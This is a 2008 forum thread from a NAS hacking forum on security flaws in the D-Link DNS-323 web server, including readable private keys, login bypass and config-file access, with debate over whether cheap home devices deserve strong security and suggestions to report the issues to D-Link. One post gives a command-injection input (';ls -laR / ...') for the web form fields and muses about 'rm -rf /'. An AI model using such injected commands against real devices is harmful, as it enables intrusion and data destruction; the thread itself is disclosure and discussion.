DSM-G600, DNS-3xx and NSA-220 Hack Forum

Intresting...

I've no funplug installed or any other software on my Nas and I found the same thing.

Last edited by Minglarn (2008-05-27 00:06:17)

the keys and certificates are generated from webs executable using these commands:

webs:/web/openssl req -x509 -newkey rsa:2048 -days 1024 -keyout /web/server-key.pem -out /web/server-cert.pem
webs:/web/openssl rsa -in /web/server-key.pem -out /web/server-key-nopassword.pem
webs:cat /web/server-key-nopassword.pem /web/server-cert.pem > /web/server.pem
webs:mv /web/server-cert.pem /web/cacert.pem
webs:mv /web/server-key.pem /web/cakey.pem

so the keys are generated randomly (they will not be the same) but by knowing your private key and capturing tls handshake skilled attacker could decode all subsequential data, or i am missing something out?

Discovered that a while ago.  I posted something about it, but only relating to opening any of the web pages without actually having to login.  Anyway, don't be too suprised, this is a SOHO device that really is not intended for great security.  Just think how big of a security issue the fun_plug is in itself.

Try stopping the webs service and restarting it as something other than root.  See if it works, or just turn it off unless you need it.

http://dns323.kood.org/forum/p15627-200 … tml#p15627

Last edited by bq041 (2008-05-27 07:05:16)

Be honest, how many users not at this forum, who bought this unit to back-up there files are ever going to try this?  Few if not none.  Heck, most users who use wireless at home just open the box, plug it in and go without doing any setup (at least until recently). 

I don't disagree that this device has some major security flaws in it.  It just seems that everybody is shocked when somebody discovers one.  I would think everyone would be used to it by now.  Yes, there are a lot of security issues, but it is a low cost device designed for a majority of users who would probably never think to try this.  At this point, I have become quite acustom to D-Link cutting corners.

i guess we have different views on security. in my opinion security should be the first thing to look out for on these devices no matter if its soho or not or if they cost 100 or 1000..
and the fact that it's the software problem, webs could be billion times more secure with proper implementation and no additional costs..

you set it all up, add some users, assign few groups thinking you're all secure and everything. but when mr. naughty breaks in your wifi network, configuration files are read, passwords are stolen and possibly, because of that the data is erased (can be way worse than just data deletion). what to think: "oh well, its a soho device, better luck next time when you spent more money!" bullcrap

Last edited by SilentException (2008-05-27 23:49:46)

SilentException wrote:

you set it all up, add some users, assign few groups thinking you're all secure and everything. but when mr. naughty breaks in your wifi network, configuration files are read, passwords are stolen and possibly, because of that the data is erased (can be way worse than just data deletion). what to think: "oh well, its a soho device, better luck next time when you spent more money!" bullcrap

Just to play the devil's advocate here, if security is such a big issue, then why are you running a wifi that mr. naughty can break into?  Besides, in you scenario, only someone who knows this system would be able to exploit it, anyway.  As you showed in your examples, you have to type in each thing you want specificaly, you can't just get a directory listing. 

By going along you same line of thinking, an ftp server should never have been put on the device.  Everyone knows how unsecure ftp is.  Besides, if you have a hacker that is good enough to break into a well set-up wifi, then there are all sorts of other avenues the person can take to access your dns without exploiting the web vulnerability.

SilentException wrote:

i'm just saying the security should not be overlooked, never ever. thats all.

bq, i took your example as the base for the wireless attack:

Heck, most users who use wireless at home just open the box, plug it in and go without doing any setup (at least until recently).

do you think this kind of user uses wpa and/or strong passwords too?

btw, ftp is insecure protocol but the implementation in dns-323 is secure (well its not secure because of the webs server from which you could read config and passwd files )

fordem: sure it can be fixed but why do their job :p

besides, one could also say that windows home (or any other) are soho os. and yet you don't see ms leaving holes all around but patching them. and here, in the 5 firmware revisions *nothing* has been done to secure web interface and thats what bugs me the most.


more "sugar" at the end: what about executing commands? i discovered that data from some input fields on web interface was used in system() calls. after bypassing javascript checks (lol) entering for example ";ls -laR / > /tmp/list" would be enough to get the complete directory listing. now what would rm -rf / do i wonder?

Just to clarify, you're comparing low-end NAS with high-end device. For example, would you expect "no-name" free after rebate router perform the same as let's say high-end Cisco router? Probably not, since those are two devices for two different purposes.

Same story here, DNS-323 is targetted at people with simple network at home who need an external storage. What we're doing on this forum is trying to make this "low-end" device into mid-range by modifying the source code and/or adding additional scripts for more functionality. However, nobody expects DNS-323 to perform as high-end device.

I can certainly see your concerns about security and they're all valid. But the truth is that most users don't care about secure FTP or VPN, they need a simple setup that they can use without reading books on security, security keys and such. At sub $200 D-Link's DNS-323 meets those customers.

In your case, if you do require better security for your application, than most probably DNS-323 is not for you and you'd need to get a different NAS with better security and more features.

Last edited by andrey (2008-05-28 23:28:01)

andrey wrote:

Just to clarify, you're comparing low-end NAS with high-end device. For example, would you expect "no-name" free after rebate router perform the same as let's say high-end Cisco router? Probably not, since those are two devices for two different purposes.

Same story here, DNS-323 is targetted at people with simple network at home who need an external storage. What we're doing on this forum is trying to make this "low-end" device into mid-range by modifying the source code and/or adding additional scripts for more functionality. However, nobody expects DNS-323 to perform as high-end device.

I can certainly see your concerns about security and they're all valid. But the truth is that most users don't care about secure FTP or VPN, they need a simple setup that they can use without reading books on security, security keys and such. At sub $200 D-Link's DNS-323 meets those customers.

In your case, if you do require better security for your application, than most probably DNS-323 is not for you and you'd need to get a different NAS with better security and more features.

no mate, i certainly am not comparing dns-323 with high end device and i do not expect it to perform like one, where did you read this? FEATURES != PERFORMANCE != SECURITY.
and the security oversights *should* be fixed in low end as in high end devices (no matter what the price is or what are the targeted customers). thats all.

don't get me wrong, i love this nas and all the hacks and mods. should get another one soon
and i'll be shutting down webs for now but its not a solution, its just a quick "hack".

migs wrote:

You should raise these concerns on the Official D-Link forum http://forums.dlink.com
Perhaps someone at D-Link will appreciate the significance of these security oversights

maybe i'll point them to this thread thanks for the tip

I reported the issue to Conceptronic last week and just got a response that they'll look into it. Nothing specific so far though.

mig wrote:

SilentException wrote:

maybe i'll point them to this thread thanks for the tip

You should post this issue to their board, I'm afraid this "hacker" site is not acknowledged by D-Link.

Let's just say that although it may not be acknowledged by D-Link, they do monitor it quite closely.

It's also interesting that people are willing to argue the merits of the DNS-323 security
with fellow hackers on this site; however, no one has raised this issue on the official
D-Link forum. 

Until the security flaw is posted to the official D-Link fourm, D-link has plausible denial
of the issue, and all our speculation about what is expected of the DNS-323 in regards to
security, is just... well, speculation.

SilentException wrote:

hm, what is the official d-link forum?

http://forum.dlink.com   You must first register to view topics.